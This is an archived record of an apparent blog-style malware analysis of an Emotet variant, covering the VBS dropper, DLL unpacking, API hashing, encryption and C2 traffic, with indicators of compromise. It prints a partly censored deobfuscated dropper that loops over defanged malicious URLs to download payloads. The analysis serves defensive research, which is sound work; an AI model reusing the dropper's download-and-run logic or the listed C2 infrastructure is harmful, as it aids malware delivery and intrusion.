{ "id": "0fe83201-58ce-4d5a-801d-15060a952410", "created_at": "2026-04-06T00:07:28.091311Z", "updated_at": "2026-04-10T03:36:11.217866Z", "deleted_at": null, "sha1_hash": "6020231ec2c1e520f832e09880c58d12efe4c074", "title": "Emotet Malware Analysis", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3079847, "plain_text": "Emotet Malware Analysis\r\nArchived: 2026-04-05 17:24:47 UTC\r\nMalwareAnalysisSeries\r\nThis repository contains the analysis reports, technical details or any tools created for helping in malware analysis.\r\nAdditionally, the repo contains extracted TTPs with code along with the detection rules\r\nProject maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham\r\nEmotet is a sophisticated, modular form of malware that initially emerged as a banking Trojan in 2014 but has\r\nevolved over the years to become a highly prevalent and versatile threat. Known for its ability to deliver additional\r\nmalware payloads and act as a distributor for other cybercriminals, Emotet has established itself as one of the most\r\nnotorious forms of malware on the internet. Emotet operates primarily through phishing campaigns, often\r\nembedding malicious code in Word or Excel documents, or via links that, when clicked, initiate the malware’s\r\ndownload. Its worm-like features also enable it to spread rapidly across networks, making it an effective tool for\r\nlarge-scale cyberattacks.\r\nEmotet is related to the threat actors called Wizard Spider, whome are also known to operate other malware\r\ncampaigns like Trickbot and Ryuk Ransomware. In this post, we will deeply analyze latest Emotet variant\r\nemerging after the take down and explain its internal workings and defense evasion tactics.\r\nStage 1: VBS Dropper\r\nThe initial dropper comes in either a malicious document including vba macro or a standalone vbs script that is\r\nhighly obfuscated and downloads additional payloads onto the system including the main emotet dll.\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 1 of 20\n\nTo debug the vbscript:\r\nSetup Command Description\r\nInstall Visual Studio with\r\n.net tools\r\ncscript /x\r\ntarget_vbs\r\nIt will automatically attach VS Debugger to it and add\r\nbreakpoint to the start\r\nThe first script extract another VBS script saved in .txt file in the %temp% directory and execute it as a vbs\r\nscript:\r\nSetup Command Description\r\nAgain debug the second\r\nscript using Visual Studio\r\ncscript //E:vbscript /x\r\nextracted_script.txt\r\nIt will treat the text file as vbs script and\r\nexecute it regardless of the extension\r\nI attached debugger to the extracted second script in %temp% and started debugging. It is again deobfuscating the\r\nscript and executing it. The decoded script is as follows:\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 2 of 20\n\nDeobfuscated VBS\r\npublic romidu\r\nurlcount=1\r\nset fsobject=createobject(\"scripting.filesystemobject\")\r\ncurrentdir=fsobject.getparentfoldername(wscript.scriptfullname)\r\nset request=createobject(\"winhttp.winhttprequest.5.1\")\r\nset file=wscript.createobject(\"shell.application\")\r\nset strout=createobject(\"adodb.stream\")\r\nuseragent=\"mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0\"\r\nouch= chr(115-1)+\"e\"+\"gs\"\u0026\"v\"+chr(113+1)+\"3\"+\"2.\"+chr(101)+\"x\"+chr(101)+\" \" + \"\"\r\npat3= currentdir+\"\\\"+fsobject.gettempname+\".zip\"\r\nset triplett=createobject(\"wscript.shell\")\r\nurl1 = \"hxxp://erkaradyator.com.tr/Areas/1Dg2PeStqNlOjuPP3fu/\"\r\nurl2 = \"hxxps://sachininternational.com/wp-admin/ILVDnlmIATb8/\"\r\nurl3 = \"hxxps://esentai-gourmet.kz/404/5oe050kBsHedqng/\"\r\nurl4 = \"hxxp://ardena.pro/dqvoakrc/Hh9/\"\r\nurl5 = \"hxxp://panel.chatzy.in/k7daqAXFTBus7mkuwwC/UQ9Y8RRqoOQ9/\"\r\nurl6 = \"hxxp://toiaagrosciences1.hospedagemdesites.ws/grupotoia/CPKU5ZE/\"\r\nurl7 = \"hxxps://suppliercity.com.mx/wp-content/x0u6wST03y6X49MOq/\"\r\ndo\r\ndow\r\nloop while urlcount\u003c8\r\npublic function dow()\r\non error resume next\r\nselect case urlcount\r\ncase 1\r\ndownstr=url1\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 3 of 20\n\ncase 2\r\ndownstr=url2\r\ncase 3\r\ndownstr=url3\r\ncase 4\r\ndownstr=url4\r\ncase 5\r\ndownstr=url5\r\ncase 6\r\ndownstr=url6\r\ncase 7\r\ndownstr=url7\r\nend select\r\n...\r\n...\r\n...\r\ncensored !!!\r\nThe script is further downloading pyaloads from the provided URLs and executing the next stage malware which\r\nis the emotet dll using rundll32.exe. By the time of my analysis the c2 servers were not live so i picked a separate\r\nEmotet dll for further analysis.\r\nStage 2: Emotet DLL\r\nOnce the Emotet file is loaded by “rundll32.exe”, its entry point function is called the very first time. It then calls\r\nthe DllMain() function where it loads and decrypts a 32-bit Dll into its memory from a “Resource” . The\r\ndecrypted Dll is the core of this Emotet, which will be referred to as “X.dll” in this analysis due to a hardcoded\r\nconstant string.\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 4 of 20\n\nI use IDA freeware (sometimes pro) for disassembling and debugging most of the malware. I will debug emotet\r\ndll using rundll32.exe. The X.dll could be seen in the memory of process using ProcessHacker tool. It could be\r\ndumped and unmapped using the pe_unmapper tool by Hasherzade.\r\nThe flow of emotet is like this:\r\n“X.dll” checks if the export function name from the command line parameter is “Control_RunDLL”. If not, it\r\nruns the command line again with “Control_RunDLL” instead of some other export, like\r\n“C:\\Windows\\syswow64\\rundll32.exe emotet.dll,Control_RunDLL”. It then calls ExitProcess() to exit the first\r\n“rundll32.exe”. it uses API CreateProcessW() to run the new command if the initial DLL has not been loaded with\r\nControL_RunDLL.\r\nWe can further use the dumped x.dll and rebase the program according to the one which we are debugging\r\ncurrently and map the exports to the functions that are being called as well. Example, call eax jumps to the Export\r\nContro_RunDLL in x.dll which is mapped in the following screenshot:\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 5 of 20\n\nI have created a function in IDA database and renamed it as Control_RunDLL_xdll for easier understanding.\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 6 of 20\n\nFrom here onwards, it will execute core malicious functionality of emotet malware.\r\nThe main method for performing malicious functionalities is highly obfuscated with Emotet introducing “Control\r\nFlow Flatening”. The complexity of control flow logic can be seen by the following control flow graph:\r\nFileless X.dll\r\nEmotet.dll when started loads x.dll from resources. It is added as a malicious encrypted resource in bitmap format.\r\nOnce x.dll is decrypted and loaded into the memory as RWX region, it acts as the main malicious code. It has\r\nanti-analysis techniques like “code flow flatening”, “dynamic api calls”, “api hashing” and encrypted strings.\r\nI have not been able to find a working script that could unflaten this sample of emotet. I have tried multiple\r\nresources like:\r\n# Links\r\n1 HexRaysDeob\r\n2 Sophos control flow de-flatenning\r\n3 MODeflattener\r\nIn the end, I decided to go manual. I wrote a script that adds breakpoints on all call instructions in specified\r\nfunction and used it on main flattened function.\r\nimport idautils\r\nimport idaapi\r\nimport idc\r\n \r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 7 of 20\n\ndef add_breakpoints_on_calls(func_name):\r\n # Get the function address by name\r\n func_ea = idc.get_name_ea_simple(func_name)\r\n if func_ea == idc.BADADDR:\r\n print(f\"Function {func_name} not found!\")\r\n return\r\n \r\n # Get the function's end address\r\n func = idaapi.get_func(func_ea)\r\n if not func:\r\n print(f\"Function {func_name} not found!\")\r\n return\r\n \r\n # Iterate through the instructions in the function\r\n for head in idautils.Heads(func.start_ea, func.end_ea):\r\n # Check if it's a call instruction\r\n if idc.print_insn_mnem(head) == \"call\":\r\n # Add a breakpoint at the call instruction\r\n idc.add_bpt(head)\r\n print(f\"Breakpoint added at 0x{head:x}\")\r\n \r\n print(f\"Breakpoints added on all call instructions in function: {func_name}\")\r\n \r\n# Example: specify the function name where you want to add breakpoints\r\nadd_breakpoints_on_calls(\"Flatten_func\") #Flatten_func is the \"code flow flatenning function that i renamed\"\r\nI then continue the debugging until something suspicious came my way instead of debugging the code line by line.\r\nThe call instruction can be used to track the API calls even if the binary is obfuscated or resolves api’s\r\ndynamically.\r\nString De-obfuscation\r\nAll strings are encrypted in x.dll (emotet in memory), which are decrypted at run-time. It decrypts the name of all\r\nadditional libraries that are loaded in the malware.\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 8 of 20\n\nThe following list of modules are loaded for further activities:\r\n# Modules\r\n1 Advapi32.dll\r\n2 Crypt32.dll\r\n3 Urlmon.dll\r\n4 iertutil.dll\r\n5 srvcli.dll\r\n6 netutils.dll\r\n7 userenv.dll\r\n8 wininet.dll\r\n9 wtsapi32.dll\r\n10 bcrypt.dll\r\n11 propsys.dll\r\n12 WS2_32.dll\r\n- -\r\nDynamic API Resolution \u0026 API Hashing\r\nAll apis are loaded dynamically to avoid detection in static analysis. In above example, we saw string for\r\n“advapi32.dll” was decrypted. In this function, it will be loaded using the API “LoadLibraryW” and executed.\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 9 of 20\n\nThe function “resolve_func” is responsible for resolving api hashes and returning api addresses after comparing\r\nhashes.\r\nIts renamed for easier understanding.\r\nFrom here onwards all APIs are resolved using API hashing and executed. I will focus on providing the major\r\nTTPs and APIs that it uses instead of providing a complete API trace here in this article.\r\nMove to secure location\r\nThe first thing it check is the commandline parameter to see if the dll has been executed with parameter of\r\nControl_RunDLL and the path from where it is executed. If the malware is not executed from %AppData%,\r\nthen it moves itself to a secure location in Appdata.\r\nThe malware use the following sequence of APIs:\r\n# APIs Description\r\n1 SHGetFolderPathW To get the path of %Appdata%\r\n2 GetCommandLineW To check commandline parameters and path\r\n3 CreateFileW To get its own handle\r\n4 GetFileInformationByHandleEx To get its own information\r\n5 GetTickCount To generate a random name\r\n6 SHFileOperationW To copy file\r\n7 DeleteFileW To delete the zone identifier on copied file\r\nThe screenshots for above mentioned task are provided below:\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 10 of 20\n\nAfter the malware has been shifted to a different location, it executes itself again with rundll32.exe which in turn\r\ndeletes the original file. The APIs used for executing itself again are as follows:\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 11 of 20\n\n# APIs Description\r\n1 CreateProcessW\r\nThe emotet is again executed with newly saved dll present in %appdata% using\r\nrundll32\r\n2 ExitProcess Exits the first process\r\nThe behavior of emotet is changed depending upon the location from where it is executed. If it is executed from\r\n%Appdata%, it proceeds further in its execution but it is executed from any other path then it changes its location\r\nand reloads itself again.\r\nInformation Discovery\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 12 of 20\n\nThe last stager copied the emotet.dll in %appdata% local folder with random folder name and file name with\r\nadded extension of .xnj. In this phase, I will again execute the dll using rundll32 with the parameter\r\nControl_RunDLL and debug its behavior further.\r\nIt started with the usual PEB walk for kernel32 and ntdll locations and finding address of LoadLibraryW and\r\nGetProcAddress. Then it loaded all modules that it needs and first checks the executing file path and module\r\nname. If everything is correct, it then gathers system information for crafting the request and register bot to c2\r\nserver.\r\n# APIs Description\r\n1 GetComputerNameA To get name of victim system\r\n2 GetWindowsDirectoryW To get the windows directory where system files are installed\r\n3 GetVolumeInformationW To get the volume information\r\nA unique behavior of Emotet was seen when it tries to delete all extra files present in its home directory in\r\n%AppData%. It is deleting every other file in its directory other than the main emotet dll. Could be one of the\r\nanti-analysis techniques to delete debugger or disassembler database files like in case of IDA (ida creates database\r\nin same directory as the file being analyzed).\r\nAs shown in the screenshot above, It is trying to delete the ida file named: cdomcinc.xnj.id0. I might have to patch\r\nthe program to avoid deleting these files, otherwise it would corrupt my IDA database.\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 13 of 20\n\nI patched the bytes to call DeleteFileW API with Nop instructions and continued. It now skips all my important\r\nfiles and move on.\r\nEstablishing Encryption Keys\r\nEmotet uses Eliptic Curve Cryptography ECDH keys for establishing encryption keys. The generated ECDH\r\nprivate key and embedded ECDH public key are used with the BCryptSecretAgreement function to generate a\r\nshared secret between the malware and C2. The AES key is derived from the shared secret using the\r\nBCryptDeriveKey function.\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 14 of 20\n\nThe trace of API calls for establishing these keys is as follows:\r\n# APIs\r\n1 BCryptGenerateKeyPair\r\n2 BCryptFinalizeKeyPair\r\n3 BCryptExportKey\r\n4 BCryptImportKeyPair\r\n5 BCryptSecretAgreement\r\n6 BCryptOpenAlgorithmProvider\r\n7 BCryptDeriveKey\r\n8 BCryptGetProperty\r\n9 BCryptImportKey\r\n10 BCryptCloseAlgorithmProvider\r\n11 BCryptDestroySecret\r\n12 BCryptDestroyKey\r\n13 BCryptDestroyKey\r\n14 BCryptCloseAlgorithmProvider\r\nCrafting 1st Request Packet\r\nEmotet crafts 1st request for registering the bot to c2 server by combining the host data that it discovered and\r\nencoding/encrypting the data with derived encryption keys and sending over http.\r\nIt gathers desktop name and hash of mac address\r\nIt gathers the path of windows\r\nIt gathers the information of volumes\r\nAppends all these together while sepearting the string with ” ; “ after each element. The string is then encoded and\r\nencrypted as follows:\r\n# APIs\r\n1 BCryptOpenAlgorithmProvider\r\n2 BCryptGetProperty\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 15 of 20\n\n# APIs\r\n3 BCryptCreateHash\r\n4 BCryptHashData\r\n5 BCryptFinishHash\r\n6 BCryptDestroyHash\r\n7 BCryptCloseAlgorithmProvider\r\n8 BCryptEncrypt\r\n9 BCryptEncrypt\r\n10 CryptBinaryToStringW\r\n11 CryptBinaryToStringW\r\nC2 Communication Over http\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 16 of 20\n\nThis sample of emotet uses wininet APIs for sending malicious requests and getting response. It uses GET and\r\nPOST requests with data being sent in a cookie header. For larger data it uses POST requests otherwise it mainly\r\nuses GET requests. I have setup a netcat listener on my Remnux box to recieve the request even though it can’t\r\ndecrypt and display the data.\r\nThe URI is randomly generated and data is encrypted in the Cookie header (a POST request is used for larger\r\namounts of data). The Cookie header contains a randomly generated key name and base64 encoded key value.\r\nOnce decoded, the key value contains:\r\ngenerated ECDH public key\r\nAES encrypted request data\r\nRandom bytes\r\nThe AES key used to encrypt request data is generated via the following method:\r\nThe generated ECDH private key and embedded ECDH public key are used with the\r\nBCryptSecretAgreement function to generate a shared secret between the malware and C2\r\nThe AES key is derived from the shared secret using the BCryptDeriveKey function\r\nFrom https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis\r\n# APIs\r\n1 InternetOpenW\r\n2 InternetConnectW\r\n3 HttpOpenRequestW\r\n4 InternetSetOptionW\r\n5 InternetQueryOptionW\r\n6 InternetSetOptionW\r\n7 HttpSendRequestW\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 17 of 20\n\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 18 of 20\n\nThe malware will be stuck in the loop here until a reponse is received from c2 server. After getting the response, it\r\ncan further download additional malware or modules into itslef like outlook credential stealer module, spam\r\nmodule, browser stealer module or lateral movement. Each module is a separate obfuscated dll that is downloaded\r\ninto the home directory and perform additional malicious tasks.\r\nIoCs\r\nUrls\r\nhxxp://erkaradyator.com.tr/Areas/1Dg2PeStqNlOjuPP3fu/\r\nhxxps://sachininternational.com/wp-admin/ILVDnlmIATb8/\r\nhxxps://esentai-gourmet.kz/404/5oe050kBsHedqng/\r\nhxxp://ardena.pro/dqvoakrc/Hh9/\r\nhxxp://panel.chatzy.in/k7daqAXFTBus7mkuwwC/UQ9Y8RRqoOQ9/\r\nhxxp://toiaagrosciences1.hospedagemdesites.ws/grupotoia/CPKU5ZE/\r\nhxxps://suppliercity.com.mx/wp-content/x0u6wST03y6X49MOq/\r\nIPs\r\n81.0.236[.]93:443\r\n94.177.248[.]64:443\r\n66.42.55[.]5:7080\r\n103.8.26[.]103:8080\r\n185.184.25[.]237:8080\r\n45.76.176[.]10:8080\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 19 of 20\n\n188.93.125[.]116:8080\r\n103.8.26[.]102:8080\r\n178.79.147[.]66:8080\r\n58.227.42[.]236:80\r\n45.118.135[.]203:7080\r\n103.75.201[.]2:443\r\n195.154.133[.]20:443\r\n45.142.114[.]231:8080\r\n212.237.5[.]209:443\r\n207.38.84[.]195:8080\r\n104.251.214[.]46:8080\r\n138.185.72[.]26:8080\r\n51.68.175[.]8:8080\r\n210.57.217[.]132:8080\r\nHashes\r\n31fb4bf411dcd7fcb860bdb1db26859290b047b39b94638a7d4fd2a46d323e98\r\nc7574aac7583a5bdc446f813b8e347a768a9f4af858404371eae82ad2d136a01\r\n5adc217c3f1fa072c40ae7ebb5f3735399e0cdd6e1add360690fb8f8fed75ceb\r\nNOTE: All samples, scripts and tools are available in my Github Repository.\r\nSource: https://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://shaddy43.github.io/MalwareAnalysisSeries/Emotet/" ], "report_names": [ "Emotet" ], "threat_actors": [ { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434048, "ts_updated_at": 1775792171, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6020231ec2c1e520f832e09880c58d12efe4c074.pdf", "text": "https://archive.orkl.eu/6020231ec2c1e520f832e09880c58d12efe4c074.txt", "img": "https://archive.orkl.eu/6020231ec2c1e520f832e09880c58d12efe4c074.jpg" } }